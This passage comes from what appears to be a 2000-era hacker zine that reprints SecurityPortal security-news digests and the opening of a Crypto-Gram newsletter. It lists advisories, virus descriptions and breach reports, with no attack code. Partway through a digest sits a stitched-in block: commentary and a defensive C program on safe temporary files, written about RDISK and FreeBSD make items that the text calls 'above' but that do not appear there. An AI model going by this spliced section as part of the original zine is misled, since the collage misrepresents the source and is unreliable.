If the host supports this environment, emails when sent from the host will be followed by a second message with the worm either attached or included as MIME TechWeb: Zero Knowledge Hires Open Source Guru <http://www.techweb.com/wire/story/TWB20000118S0027> - Mike Shaver, who headed developer relations for the Mozilla.org project, is joining Zero-Knowledge Systems, a Montreal company rolling out an identity-cloaking Internet service Kurt's Closet: SuSE Linux - a vendor gets security conscious <http://securityportal.com/direct.cgi?/closet/closet20000119.html> - a look at the built in security features of SuSE Linux, including an interview with SuSE security maven Marc Heuse MSNBC: "Smurf Attack" snarls web service in Seattle over the weekend <http://www.msnbc.com/local/king/483728.asp> - A "smurf" attack or series of attacks on an Internet service provider snarled Wide World Web traffic in as much as 70 percent of the region last weekend, operators of the service say. See http://securityportal.com/cover/coverstory19990531.html <http://securityportal.com/cover/coverstory19990531.html> to learn about Smurf Amplifier Attacks Jan 18, 2000 Response: Some thoughts on (network) intrusion detection systems <http://securityportal.com/direct.cgi?/closet/closet20000112-response.html> - Kurt Seifried responds to the article featured prominently at Linux Today questioning his analysis of the shortcomings of network-based intrusion detections. (How much confidence do you have in your ID tools?) Sophos: Guidelines for Safe Hex <http://www.sophos.com/virusinfo/articles/safehex.html> - As well as keeping your anti-virus software up to date there are other ways in which you can reduce the chances of virus infection inside your company. 
We list some of the guidelines you might like to consider for safer computing in your organisation TechnologyPost: Hackers target Visa, other big firms <http://www.technologypost.com/enterprise/DAILY/20000118105052617.asp?Sectio n=Main> - Visa International has confirmed British press reports at the weekend that its global network was sniffed by hackers or similar people unknown last summer, but that its security systems locked down the on-line sessions before any systems break-ins occurred Wired: Online Security Remains Elusive <http://www.wired.com/news/politics/0,1283,33569,00.html> - As e-business lights up the Web, the critical matter of data security is headed for center stage. There have been too many security failures in the past and it's going to get worse, said Paul Kocher, president and chief scientist for Cryptography Research FoxNews: Artificial Immunology <http://www.foxnews.com/vtech/011800/virus2.sml> - Protection and recovery efforts from hack attacks and viruses account for 2.5 percent - or 25 billion - of global spending on information technology each year. The costs are so high mainly due to labor-intensive data recovery and productivity loss from downed systems Sophos: WM97/Marker-BU a Word 97 macro virus <http://www.sophos.com/downloads/ide/> - WM97/Marker-BU is a variant of Marker-R with various changes, and has been seen in the wild. If the date is between 23rd and 31st of July the virus changes the Application.Caption from Microsoft Word to Happy Birthday Shankar-25th July. The world may Forget but not me. It then displays a message box asking Did You curse Shankar on his Birthday? If you answer Yes another message box appears saying Thank You! I love you. are u free tonight? However, if you click No a message box appears saying You are Heart Less. 
The virus then makes changes to the document summary TechWeb: Entrust Launches Security Outsourcing <http://www.techweb.com/wire/story/TWB20000118S0006> - Entrust, a provider of public key infrastructure and digital certificate security applications, on Monday unveiled plans to provide outsourced security services for business-to-business and business-to-consumer transactions, and said it has partnered with Cash Tax to host the service InfoWorld: Panelists debate the issues surrounding cryptography <http://www.infoworld.com/articles/ic/xml/00/01/17/000117iccrypto.xml> - Issues including ease of use, governmental regulations, and wireless systems will be at the forefront of the cryptography realm in upcoming years, a panel of specialists said Monday at the RSA Conference 2000 show. The panelists, with affiliations ranging from the Massachusetts Institute of Technology to Sun Microsystems, urged that a variety of actions be taken by the industry Wired: 56 a Bit Short of Secure <http://www.wired.com/news/technology/0,1282,33695,00.html> - The collective crackers of Distributed.net have knocked off another 56-bit encryption key, this time in just over two months InfoWorld: Verisign aims to secure wireless transactions <http://www.infoworld.com/articles/ic/xml/00/01/17/000117icverisign.xml> - At the RSA Conference 2000 show here on Monday, VeriSign unveiled a set of technologies, services, and alliances to promote trusted, wireless Internet commerce. Citing the growth in usage of wireless devices, VeriSign Vice President of Worldwide Marketing Richard Yanowitch said that the initiative is intended to provide a complete trust infrastructure to the wireless world PCWorld: The Web Is a Hacker's Playground <http://www.pcworld.com/current_issue/article/0,1212,14415,00.html> - Can the Net be crime-proofed? 
Not as long as there are sloppy programmers and clever cat burglars Microsoft Bulletin: Malformed RTF Control Word <http://securityportal.com/topnews/ms00-005.html> - The control information is specified via directives called control words. The default RTF reader that ships as part of many Windows platforms has an unchecked buffer in the portion of the reader that parses control words. If an RTF file contains a specially-malformed control word, it could cause the application to crash. A patch is available for this vulnerability, which can causes a Denial of Service condition in all Microsoft Operating Systems Jan 17, 2000 FCW: NSA grapples with Linux security <http://www.fcw.com/fcw/articles/web-nsalinux-01-17-00.asp> - The National Security Agency, the super-secret arm of the Defense Department responsible for signals intelligence and information systems security, last week tapped Secure Computing Corp. to develop a secure version of the Linux operating system IDG: Film studios bring claim against DVD hackers <http://www.idg.net/idgns/2000/01/17/FilmStudiosBringClaimAgainstDVD.shtml> - Eight major motion picture companies late last week filed injunction complaints in U.S. Federal Court against three alleged hackers to prevent them from publishing an unauthorized DVD de-encryption program on their Web sites ******* What's new with SecurityPortal.com ******* The Unbreakable Cipher: Why Not Just Stay With Perfection? John Savard gets under the covers of ciphers to explain why the market uses DES and RSA algorithms instead of the "perfect" cipher. Read the full story here. <http://securityportal.com/direct.cgi?/topnews/crypto20000119.html> Tell us how we are doing. Send any other questions or comments to webmaster@securityportal.com <mailto:webmaster@securityportal.com> . 
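Two items in the Jan 24 digest above share one root cause: the RDISK temporary file that is left readable by other users, and the FreeBSD make temp file whose fixed name is deleted and reused for the life of the program, so a file planted under that name can be picked up as the next batch of commands. The C program below is an added example (not code from the advisories, from FreeBSD, or from this zine) of the mitigation a defender wants: mkstemp() for an unpredictable name opened with O_EXCL and a 0600 mode, a fresh file per use, and a check through the already-open descriptor (never by path) that the file is a regular, single-link, owner-only file before anything sensitive is written. It assumes a POSIX system with a writable TMPDIR or /tmp; the function names and the "cmds.XXXXXX" template are hypothetical.

```c
/* Added example (not the advisories' or the zine's code): safe temporary-file
 * handling that avoids both defects listed above: a predictable, reused name
 * (FreeBSD make) and a sensitive temp file readable by others (RDISK).
 * Assumes a POSIX system; function names and the template are hypothetical. */
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create a fresh, private temp file. mkstemp() picks an unpredictable name
 * and opens it with O_CREAT|O_EXCL, so a file or symlink planted under the
 * same name makes the call fail instead of being silently reused (the make
 * race). Returns the open descriptor and stores the path in 'path' (size n),
 * or -1 with errno set. */
static int open_private_tempfile(char *path, size_t n) {
    const char *dir = getenv("TMPDIR");
    if (dir == NULL || *dir == '\0') dir = "/tmp";
    if (snprintf(path, n, "%s/cmds.XXXXXX", dir) >= (int)n) {
        errno = ENAMETOOLONG;
        return -1;
    }
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    /* Modern libcs create the file 0600; older ones used 0666, so set it
     * explicitly (the RDISK defect was exactly an over-permissive temp file). */
    if (fchmod(fd, S_IRUSR | S_IWUSR) != 0) {
        int saved = errno;
        close(fd);
        unlink(path);
        errno = saved;
        return -1;
    }
    return fd;
}

/* Verify through the open descriptor (never by re-opening the path, which
 * would reintroduce the race) that what we hold is a regular file owned by
 * us, with one link and no group/other permission bits. 1 = private. */
static int tempfile_is_private(int fd) {
    struct stat st;
    if (fstat(fd, &st) != 0) return 0;
    if (!S_ISREG(st.st_mode)) return 0;
    if (st.st_uid != geteuid()) return 0;
    if (st.st_nlink != 1) return 0;
    if (st.st_mode & (S_IRWXG | S_IRWXO)) return 0;
    return 1;
}

/* Write one batch of commands to its own freshly created, validated file
 * (a new file per batch, never one fixed name for the program's lifetime).
 * Returns the number of bytes written, or -1. */
static long write_command_batch(const char *cmds, char *path, size_t n) {
    int fd = open_private_tempfile(path, n);
    if (fd < 0) return -1;
    if (!tempfile_is_private(fd)) {
        close(fd);
        unlink(path);
        return -1;
    }
    size_t len = strlen(cmds);
    ssize_t w = write(fd, cmds, len);
    close(fd);
    return (w == (ssize_t)len) ? (long)w : -1;
}

/* End-to-end check: two batches land in two distinct private files, and a
 * file whose mode is loosened afterwards is rejected by the validator.
 * Returns 0 on success or a small code identifying the failed step. */
static int self_check(void) {
    char p1[256], p2[256], p3[256];
    /* Constructed sample input: two command batches, as make would emit. */
    if (write_command_batch("echo build step 1\n", p1, sizeof p1) != 18) return 1;
    if (write_command_batch("echo build step 2\n", p2, sizeof p2) != 18) return 2;
    int distinct = strcmp(p1, p2) != 0;
    unlink(p1);
    unlink(p2);
    if (!distinct) return 3;
    int fd = open_private_tempfile(p3, sizeof p3);
    if (fd < 0) return 4;
    int ok_before = tempfile_is_private(fd);
    (void)fchmod(fd, 0644);             /* simulate a world-readable temp file */
    int ok_after = tempfile_is_private(fd);
    close(fd);
    unlink(p3);
    if (!ok_before) return 5;
    if (ok_after) return 6;
    return 0;
}

int main(void) {
    int rc = self_check();
    printf("temp-file self check: %s (code %d)\n", rc == 0 ? "ok" : "FAILED", rc);
    return rc;
}
```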
Jim Reavis
SecurityPortal.com - The focal point for security on the Net
jreavis@SecurityPortal.com <mailto:jreavis@SecurityPortal.com>

@HWA

18.0 Security Portal Review Jan 31st
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

******* Vendor Corner *******

Sponsored by VeriSign - The Internet Trust Company

Protect your servers with 128-bit SSL encryption today! Get VeriSign's FREE
guide, "Securing Your Web Site for Business". It tells you everything you need
to know about using SSL to encrypt your e-commerce transactions for serious
online security. Click here!
http://www.verisign.com/cgi-bin/go.cgi?a=n016001690008000
<http://www.verisign.com/cgi-bin/go.cgi?a=n016001690008000>

******* What's new with SecurityPortal.com *******

Information Warfare

As the latest buzzword to succeed Y2K on the media's "terror throne,"
information warfare (IW), as a useful term, begs for realistic definition. No
doubt, bin Laden can attack us. Graduate students at Cal Tech, MIT, or UCLA
and tenth-graders at your local high school can also launch "volleys" against
corporate America. How effective such invasions would be is the critical
issue. In the Gulf War, Iraqi anti-aircraft batteries expended vast rounds
against allied planes, and it was almost totally ineffective. Sheer bulk
doesn't always equate to victory. Read the full story here.
<http://securityportal.com/direct.cgi?/cover/coverstory20000131.html>

A Practical Guide to Cryptography

What is it, where do I get it and how do I use it? Kurt Seifried has developed
a How-to for using cryptography with several operating systems. Find the guide
here. <http://securityportal.com/research/cryptodocs/basic-book/index.html>

******* Vendor Corner *******

NOW from Entrust Technologies: All the power of proven Entrust solutions in a
managed service. With Entrust@YourService, you're choosing:
* the leader in bringing trust to e-business
* a solution that will evolve with your e-business needs
* a single, reliable trust backbone for all that you do
Entrust@YourService is the choice for companies like yours that need to secure
e-business quickly and reliably - without losing focus on what you do best.
Click for more info: http://www.entrust.com/choice2
<http://www.entrust.com/choice2>

******* Top News *******

January 31, 2000

Welcome to SecurityPortal.com - The focal point for security on the Net.

Recent postings in our top news
<http://www.securityportal.com/framesettopnews.html>:

Jan 31, 2000

ZDNet: What's wrong with Microsoft security?
<http://www.zdnet.com/zdnn/stories/comment/1,5859,2429536,00.html>
- The term "Microsoft's latest security glitch" has become a cliche. But it
didn't have to

Jan 28, 2000

Wired: Fast, Simple ... and Vulnerable
<http://www.wired.com/news/technology/0,1282,33972,00.html>
- An online bank's opening has been marred by a glitch that let customers
transfer money from any U.S. bank account. Anyone who knew what they were
doing could move funds to an X.com bank account and then withdraw them

ZDNet: Win2000 security hole a 'major threat'
<http://www.zdnet.com/zdnn/stories/news/0,4586,2429334,00.html?chkpt=zdnntop>
- Six banks and three major PC makers affected by bug that lets attackers view
files stored on Microsoft Index Server. Microsoft issues patch.

CNN: DoubleClick suit filed
<http://cnnfn.com/2000/01/28/emerging_markets/wires/doubleclick_wg/>
- Woman accuses Net advertising firm of privacy violations

TechWeb: Axent To Develop Linux Firewall With Cobalt
<http://www.techweb.com/wire/story/TWB20000127S0014>
- E-security vendor Axent Technologies Thursday unveiled a partnership with
Cobalt Networks under which the companies will produce a Linux firewall and
virtual private network appliance for small to midsize companies, branch
offices, and service providers

ComputerWorld: Congress backs federal efforts on Y2K, is wary on security
<http://www.computerworld.com/home/print.nsf/all/000127E416>
- Fernando Burbano, the CIO at the U.S. Department of State, said federal
agencies don't have the money to pursue critical infrastructure protection
initiatives

LinuxJournal: Crackers and Crackdowns
<http://www2.linuxjournal.com/articles/culture/007.html>
- DeCSS author Jon Lech Johansen's home was raided by special police forces at
the whim of the Motion Picture Association, an organization which
affectionately refers to itself as "a little State Department".

Mercury Center: Student charged with hacking
<http://www.mercurycenter.com/svtech/news/indepth/docs/hacker012700.htm>
- A federal grand jury in San Jose on Wednesday indicted a former Princeton
University student suspected of hacking into the computer system of a Palo
Alto e-commerce company and stealing nearly 2,000 credit card numbers.

InternetNews: Hackers Close Japanese Government Sites
<http://www.internetnews.com/intl-news/article/hackers.html>
- So far this week, hackers have made three successful attacks on the official
Web sites of two Japanese government agencies, altering the agencies'
homepages and possibly deleting government data.

ZDNet: Smart card 'inventor' lands in jail
<http://www.zdnet.com/zdnn/stories/news/0,4586,2428429,00.html>
- Serge Humpich says he wasn't really stealing subway tokens -- just testing
his new invention. It could cost him seven years.

Jan 27, 2000

Wired: U.S. to Push China on Encryption
<http://www.wired.com/news/politics/0,1283,33950,00.html>
- The United States will press China to explain new regulations on encryption
technology at a meeting of economic leaders in Davos, Switzerland, U.S. Trade
Representative Charlene Barshefsky said Thursday.

TheRegister: New hack attack is greater threat than imagined
<http://www.theregister.co.uk/000127-000005.html>
- It was news a month ago; days later it vanished. The mainstream press may
have forgotten it, but security specialists gathered in California last week
for the sixth RSA Conference to consider the growing trend in malicious
computer assaults called distributed denial of service (DDoS) attacks. Dealing
with this sort of assault can be maddening for the primary victim. The clients
from which the attack is launched are themselves intermediate victims who
rarely know that their systems have been compromised. They are in diverse
locations around the world, administered by people who speak different
languages, making it nearly impossible for one victim to explain to another
how to cope with the threat

ZDNet: Does DoubleClick track too closely?
<http://www.zdnet.com/zdnn/stories/news/0,4586,2428392,00.html?chkpt=zdnntop>
- Many e-shoppers don't realize that companies like DoubleClick's Abacus
Direct pick up your trail at one of their sites and follow it wherever you go

vnunet: Visa strengthens network after number kidnap
<http://www.vnunet.com/News/105782>
- Last week a Visa spokesman admitted that hackers had penetrated its computer
network last July, but stressed that they were detected almost immediately.
The company has since hardened its systems and the hackers have not returned,
he said

TheRegister: New crypto technique beats current standard
<http://www.theregister.co.uk/000127-000025.html>
- Called Cipherunicorn-A, the technique creates a number of false keys in
addition to the true encryption key, making it more difficult for potential
intruders to crack. The approach should increase security while remaining
compliant with the Data Encryption Standard (DES) introduced by the US
Department of Commerce, a company spokesperson told The Register

CNet: Corel hurries to fix Linux security hole
<http://news.cnet.com/news/0-1003-200-1533081.html?tag=st.ne.1002.bgif.1003-200-1533081>
- Corel is working to patch a bug with its version of Linux that could let
unauthorized users gain access to machines running Corel Linux, with a program
called Corel Update

ZDNet: Bernstein crypto case to be reheard
<http://www.zdnet.com/zdnn/stories/news/0,4586,2428386,00.html?chkpt=zdhpnews01>
- A U.S. Appeals Court panel will reconsider an earlier ruling striking down
export limits on computer data scrambling products in light of new export
rules announced this month by the White House

Microsoft Bulletin: Index Server
<http://securityportal.com/topnews/ms00-006.html>
- This patch eliminates two vulnerabilities whose only relationship is that
both occur in Index Server. The first is the "Malformed Hit-Highlighting
Argument" vulnerability. The second vulnerability involves the error message
that is returned when a user requests a non-existent Internet Data Query file

SCO Security Advisories: rtpm, scohelp
<http://www.sco.com/security/>
- patches are available for buffer overflow vulnerabilities in rtpm, scohelp

CNN: Security improvements made at national labs
<http://www.cnn.com/2000/US/01/26/nuclear.security.ap/index.html>
- Security at nuclear weapons labs has made "monumental strides" in the past
year, but computer protection is still not 100 percent, the Energy
Department's top security official says.

Jan 26, 2000

Wired: Echelon 'Proof' Discovered
<http://wired.com/news/politics/0,1283,33891,00.html>
- References to a project Echelon have been found for the first time in
declassified National Security Agency documents, says the researcher who found
them. Researcher claims there is no evidence over mis-use of the system

Industry Standard: China Installs Net Secrecy Rules
<http://www.thestandard.net/article/display/0,1151,9125,00.html>
- China clamped new controls onto the Internet on Wednesday to stop Web sites
from "leaking state secrets" and an official newspaper said curbs on news
content were on the way

BBC: Old computer viruses still bite
<http://news.bbc.co.uk/hi/english/sci/tech/newsid_619000/619687.stm>
- An analysis of the most common computer viruses of 1999 shows that although
the threat of new self-propagating viruses is growing, older viruses are still
very common. One boot sector virus, Form, is nearly a decade old but still
appears in the top ten

FCW: Clinton aides fight for cybersecurity bill
<http://www.fcw.com/fcw/articles/2000/0124/web-securitybill-01-26-00.asp>
- Senior Clinton administration officials are urging Congress to support a
bill that would provide a defense against criminals who now have access to
more secure communications thanks to new encryption export regulations
released this month

ZDNet: Scam tricks users into 'stealing'
<http://www.zdnet.com/zdnn/stories/news/0,4586,2427490,00.html?chkpt=zdhpnews01>
- So just what do computer criminals do with stolen credit cards? How about
tricking innocent electronics shoppers into stealing on their behalf? That's
how at least one scam artist is playing the online credit card game, MSNBC has
learned

Why random numbers are important for security
<http://securityportal.com/direct.cgi?/closet/closet20000126.html>
- Modern computer security requires some level of encryption to be applied to
various kinds of data, for example secure web transactions, or SSH. But
something that often goes ignored is the fact that all good crypto relies on
some degree of randomness, which if not fulfilled properly can lead to a
significant loss in the strength of encryption

Sophos: XM97/Divi-A Excel 97 Macro virus
<http://www.sophos.com/virusinfo/analyses/xm97divia.html>
- XM97/Divi-A is an Excel spreadsheet macro virus. It creates a file called
BASE5874.XLS in the Excel template directory, and will infect other
spreadsheets as they are opened or closed

Caldera: Advisory number: CSSA-1999-039.0 Various security problems with
majordomo
<ftp://ftp.calderasystems.com/pub/OpenLinux/security/CSSA-1999-039.0.txt>
- There are several bugs in majordomo that allow arbitrary users to execute
commands with the privilege of majordomo. If the sendmail aliases file
contains aliases that invoke majordomo, a compromise of additional system
accounts is possible, which may further on lead to a root compromise. An
immediate root exploit has not been found however

Jan 25, 2000

MontrealGazette: How safe is voice mail?
<http://www.montrealgazette.com/news/pages/000124/3483600.html>
- When Steven Boudrias was charged recently with infiltrating the Montreal
Urban Community police department's voice-mail system, the question blinking
alongside the message light on most people's phones is how safe electronic
call-answering really is

Intelligence Gathering on the Net
<http://securityportal.com/direct.cgi?/topnews/intell20000125.html>
- Prerequisites for computer security professionals include a knowledge of
networking, scripting languages, operating systems, and security
countermeasures. High-level technical savvy marks the true professional; such
expertise, however, carries a practitioner only so far. An effective
professional also listens for what's coming down the track

Fairfax: Big keys unlock door to strong encryption
<http://www.it.fairfax.com.au/software/20000125/A39666-2000Jan21.html>
- Australians will find it much easier to get strong cryptography protection
for their on-line business activities following the United States
Government's 14 January decision to liberalise its export restrictions

HP Bulletin: Security Vulnerability with PMTU strategy
<http://securityportal.com/topnews/hp20000124.html>
- An HP-UX 10.30/11.00 system can be used as an IP traffic amplifier. Small
amounts of inbound traffic can result in larger amounts of outbound traffic

Sophos: WM97/Melissa-AK virus
<http://www.sophos.com/virusinfo/analyses/wm97melissaak.html>
- WM97/Melissa-AK is a variant of WM97/Melissa. It will attempt to email a
copy of the infected document to the first 50 entries in the Outlook address
book. If the current day of the month is equal to the current minute it will
insert the phrase Symbytes Ver. 7.x mucking about..The Mahatma. into the
active document

Cisco: IPsec/CEF Software Defect on Route Switch Processors
<http://www.cisco.com/warp/public/770/fn10611.shtml>
- On all RSP and RSM processors, when an interface in the router is configured
with an IPSec crypto map and the switching mode is Cisco Express Forwarding
(CEF), the RSP and RSM will restart when it attempts to decrypt IPSec packets.
Patch not yet available, workaround is to disable Cisco Express Forwarding

Sunday Times: French spies listen in to British calls
<http://www.sunday-times.co.uk/news/pages/Sunday-Times/stinwenws03006.html?999>
- French intelligence is intercepting British businessmen's GSM calls after
investing millions in satellite technology for its listening stations

Computer Currents: Cybercrime Harder to Prosecute
<http://www.computercurrents.com/newstoday/00/01/24/news2.html>
- US Justice Department officials reportedly called computer crime a growing
menace to corporations worldwide, and admitted that law enforcement agents
face major hurdles in combating it

ZDNet: Hackers impersonate AOL users
<http://www.zdnet.com/zdnn/stories/news/0,4586,2426698,00.html?chkpt=zdhpnews01>
- Teenage hackers are pretending to be AOL users, then coercing friends into
divulging personal information

Jan 24, 2000

ABCNews: Law Enforcement Is Rushing to Catch the Online Crime Wave
<http://abcnews.go.com/sections/us/DailyNews/cybercrime_part2.html>
- From Web site hackers to child pornographers, credit card thieves and e-mail
terrorists, crime online is mushrooming, says Schwartz. And the crime fighters
are struggling to catch up

Wired: More Bad News for DVD Hackers
<http://www.wired.com/news/politics/0,1283,33845,00.html>
- Judge William J. Elfving issued a preliminary injunction Friday ordering 21
defendants to stop posting code that breaks through the security software of
DVDs to their Web sites

Wired: Outpost Leaves Data Unguarded
<http://www.wired.com/news/technology/0,1282,33842,00.html>
- While James Wynne was checking his online order Friday at Outpost.com, he
noticed something curious -- he could check orders from other people, too

******* What's new with SecurityPortal.com *******

The Unbreakable Cipher: Why Not Just Stay With Perfection?

John Savard gets under the covers of ciphers to explain why the market uses
DES and RSA algorithms instead of the "perfect" cipher. Read the full story
here. <http://securityportal.com/direct.cgi?/topnews/crypto20000119.html>

Tell us how we are doing. Send any other questions or comments to
webmaster@securityportal.com <mailto:webmaster@securityportal.com>.

Jim Reavis
SecurityPortal.com - The focal point for security on the Net
jreavis@SecurityPortal.com <mailto:jreavis@SecurityPortal.com>

@HWA

19.0 CRYPTOGRAM Jan 15th
~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded
From: Bruce Schneier <schneier@counterpane.com>

CRYPTO-GRAM

January 15, 2000

by Bruce Schneier
Founder and CTO
Counterpane Internet Security, Inc.
schneier@counterpane.com
http://www.counterpane.com

A free monthly newsletter providing summaries, analyses, insights, and commentaries on computer security and cryptography.

Back issues are available at http://www.counterpane.com. To subscribe or unsubscribe, see below.

Copyright (c) 2000 by Bruce Schneier

** *** ***** ******* *********** *************

In this issue:
"Key Finding" Attacks and Publicity Attacks
Counterpane -- Featured Research
News
New U.S. Encryption Regulations
Counterpane Internet Security News
The Doghouse: Netscape
Block and Stream Ciphers
Comments from Readers

** *** ***** ******* *********** *************

"Key Finding" Attacks and Publicity Attacks

A couple of weeks ago the New York Times reported a new "key finding" attack. This was a follow-up to some research discussed here some months ago, showing how to search for, and find, public and private cryptographic keys in software because of their random bit patterns. The company nCipher demonstrated that someone who has access to a Web server that uses SSL can find the SSL private key using these techniques, and potentially steal it. nCipher's press release talked of "a significant vulnerability to today's Internet economy."

Huh? Why is this news? It's not the fact that the SSL private keys are on the Web server. That's obvious; they have to be there. It's not the fact that someone who has access to the Web server can potentially steal the private keys. That's obvious, too. It's not the news that a CGI attack can compromise data on a Web server. We've seen dozens of those attacks in 1999. Even the press release admits that "no information is known to have been compromised using a 'key-finding' attack." Neither nCipher nor the New York Times found anyone who was vulnerable.

But wait . . . nCipher sells a solution to this "problem."

Okay, now I understand.

I call this kind of thing a publicity attack. It's a blatant attempt by nCipher to get some free publicity for the hardware encryption accelerators, and to scare e-commerce vendors into purchasing them. And people fall for this, again and again.

This kind of thing is happening more and more, and I'm getting tired of it. Here are some more examples:

* An employee of Cryptonym, a PKI vendor, announced that he found a variable with the prefix "NSA" inside Microsoft's cryptographic API. Based on absolutely zero evidence, this was held up as an example of NSA's manipulation of the Microsoft code.

* Some people at eEye discovered a bug in IIS last year, completely compromising the product. They contacted Microsoft, and after waiting only a week for them to acknowledge the problem, they issued a press release and a hacker tool. Microsoft rushed a fix out, but not as fast as the hackers jumped on the exploit. eEye sells vulnerability assessment tools and security consulting, by the way.

I'm a fan of full disclosure -- and definitely not a fan of Microsoft's security -- and believe that security vulnerabilities need to be publicized before they're fixed. (If you don't publicize, the vendors often don't bother fixing them.) But this practice of announcing "vulnerabilities" for the sole purpose of hyping your own solutions has got to stop.

Here are some examples of doing things right:

* The University of California Berkeley researchers have broken just about every digital cellphone security algorithm. They're not profiting from these breaks. They don't publish software packages that can listen in on cellphone calls. This is research, and good research.

* Georgi Guninski has found a huge number of JavaScript holes over the past year or so. Rather than posting scary exploits and cracking tools that script kiddies could take advantage of, and rather than trying to grab the limelight, he has been quietly publishing the problems and available workarounds. Of course, the downside is that these bugs get less attention from Microsoft and Netscape, even though they are as serious as many others that have received more press attention and thus get fixed quickly by the browser makers. Nonetheless, this is good research.

* The L0pht has done an enormous amount of good by exposing Windows NT security problems, and they don't try to sell products to fix the problems. (Although now that they've formed a VC-funded security consulting company, @Stake, they're going to have to tread more carefully.)

* Perfecto markets security against CGI attacks. Although they try to increase awareness of the risks, they don't go around writing new CGI exploits and publicizing them. They point to other CGI exploits, done by hackers with no affiliation to the company, as examples of the problem.

* Steve Bellovin at AT&T labs found a serious hole in the Internet DNS system. He delayed publication of this vulnerability for years because there was no readily available fix.

How do you tell the difference? Look at the messenger. Who found the vulnerability? What was their motivation for publicizing? The nCipher announcement came with a Business Wire press release, and a PR agent who touted the story to reporters. These things are not cheap -- the press release alone cost over $1000 -- and should be an obvious tip-off that other interests are at stake.

Also, look critically at the exploit. Is it really something new, or is it something old rehashed? Does it expose a vulnerability that matters, or one that doesn't? Is it actually interesting? If it's old, doesn't matter, and uninteresting, it's probably just an attempt at press coverage.

And look at how it is released. The nCipher release included a hacker tool. As the New York Times pointed out, "thus making e-commerce sites more vulnerable to attack and more likely to buy nCipher's product." Announcements packaged with hacker tools are more likely to be part of the problem than part of the solution.

I am a firm believer in open source security, and in publishing security vulnerabilities. I don't want the digital cellphone industry, or the DVD industry, to foist bad security off on consumers. I think the quality of security products should be tested just as the quality of automobiles is tested. But remember that security testing is difficult and time-consuming, and that many of the "testers" have ulterior motives. These motives are often just as much news as the vulnerability itself, and sometimes the announcements are more properly ignored as blatant self-serving publicity.

The NY Times URLs using their search function change daily, but you can go to http://search.nytimes.com/plweb-cgi/ and use the Extended Search; the article title is "Attacks on Encryption Code Raise Questions About Computer Vulnerability".

NCipher's press release:
http://www.ncipher.com/news/files/press/2000/vulnerable.html

NCipher's white paper (Acrobat format):
http://www.ncipher.com/products/files/papers/pcsws/pcsws.pdf

** *** ***** ******* *********** *************

Counterpane -- Featured Research

"A Cryptographic Evaluation of IPsec"

N. Ferguson and B. Schneier, to appear

We perform a cryptographic review of the IPsec protocol, as described in the November 1998 RFCs. Even though the protocol is a disappointment -- our primary complaint is with its complexity -- it is the best IP security protocol available at the moment.

http://www.counterpane.com/ipsec.html

** *** ***** ******* *********** *************

News

You can vote via the Internet in the Arizona Democratic primary. Does anyone other than me think this is terrifying?
http://dailynews.yahoo.com/h/nm/19991217/wr/arizona_election_1.html

An expert at the British government's computer security headquarters has endorsed open-source solutions as the most secure computer architecture available:
http://212.187.198.142/news/1999/50/ns-12266.html

The DVD Copy Control Association is pissed, and they're suing everyone in sight.
http://www.cnn.com/1999/TECH/ptech/12/28/dvd.crack/

Moore's Law and its effects on cryptography:
http://www.newscientist.com/ns/20000108/newsstory2.html

Information warfare in the Information Age:
http://www.cnn.com/1999/TECH/computing/12/30/info.war.idg/index.html
http://www.it.fairfax.com.au/industry/19991227/A59706-1999Dec27.html

Radio pirates: In the U.K., some radios can receive a digital signal that causes them to automatically switch to stations playing traffic reports. Hackers have figured out how to spoof the signal, forcing the radio to always tune to a particular station. Good illustration of the hidden vulnerabilities in digital systems.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_592000/592972.stm
http://uk.news.yahoo.com/000106/18/d6jt.html

Well, this sure is inaccurate:
http://www.lancrypto.com/algorithms_e.htm

Some months ago I mentioned the Y2K notice from Hart Scientific. They now have a sequel:
http://www.hartscientific.com/y2k-2.htm

RSA "digital vault" software:
http://news.excite.com/news/pr/000111/ma-rsa-keon-software

E-commerce encryption glitch; a good example of why people are the worst security problem. A programmer just forgot to reactivate the encryption.
http://news.excite.com/news/r/000107/17/news-news-airlines-northwest

Become an instant cryptography portal. Encryption.com, encryption2000.com, and 1-800-ENCRYPT are for sale.
http://news.excite.com/news/bw/000111/wa-azalea-software
http://www.encryption.com

Mail encryption utility that lets you take back messages you regret sending. Does anyone believe that this is secure?
http://www.zdnet.com:80/anchordesk/story/story_4323.html

Human GPS implants:
http://www.newscientist.com/ns/20000108/newsstory8.html

Clinton's hacker scholarships:
http://chronicle.com/free/2000/01/2000011001t.htm

Microsoft is building a VPN into Windows 2000. Whose tunnel do you want to hack today?
http://www.networkworld.com/news/2000/0110vpn.html

Someone stole a bunch of credit card numbers from CD Universe, tried extortion, then posted some:
http://www.wired.com/news/technology/0,1282,33563,00.html
http://www.msnbc.com/news/355593.asp
and Cybercash's reaction (with a nice quote about how impregnable their product's security is; way to wave a red flag at the hackers):
http://www.internetnews.com/ec-news/article/0,1087,4_279541,00.html

An interesting three-part article about video surveillance and its effect on society:
http://www.villagevoice.com/issues/9840/boal.shtml

The system used to fund a series of anti-Bush commercials loosely resembles my "street performer protocol," using the credit card company instead of a publisher as a trusted third party. They validate your card when you pledge, but only charge it if they get enough to run an ad:
http://www.gwbush.com/
Street performer protocol:
http://www.counterpane.com/street_performer.html

You can steal subway rides on the NY City system by folding the Metrocard at precisely the right point. The Village Voice and NY Times ran stories about it, but those are no longer available, at least for free. There's a copy of the NYTimes story here:
http://www.monkey.org/geeks/archive/9801/msg00052.html
The 2600 "Off the Hook" RealAudio for 2/3/98 talks about it, starting around 54:35. The RealAudio is linked from here:
http://www.2600.com/offthehook/1998/0298.html

The White House released a national plan to protect America's computer systems from unauthorized intrusions. This plan includes the establishment of the controversial Federal Intrusion Detection Network (FIDNET), which would monitor activity on government computer systems. (So far, there are no plans to monitor commercial systems, but that can change. The government does want to involve industry in this.)
The plan also calls for the establishment of an "Institute for Information Infrastructure Protection" and a new program that will offer college scholarships to students in the field of computer security in exchange for public service commitments. The scholarship program seems like a good idea; we need more computer security experts.
http://www.thestandard.com/article/display/0,1151,8661,00.html
http://dailynews.yahoo.com/h/ap/20000107/ts/clinton_cyber_terrorism_4.html
http://news.excite.com/news/ap/000107/01/tech-clinton-cyber-terrorism
http://www.msnbc.com/news/355783.asp
http://www.computerworld.com/home/print.nsf/all/000107DB3A
EPIC analysis:
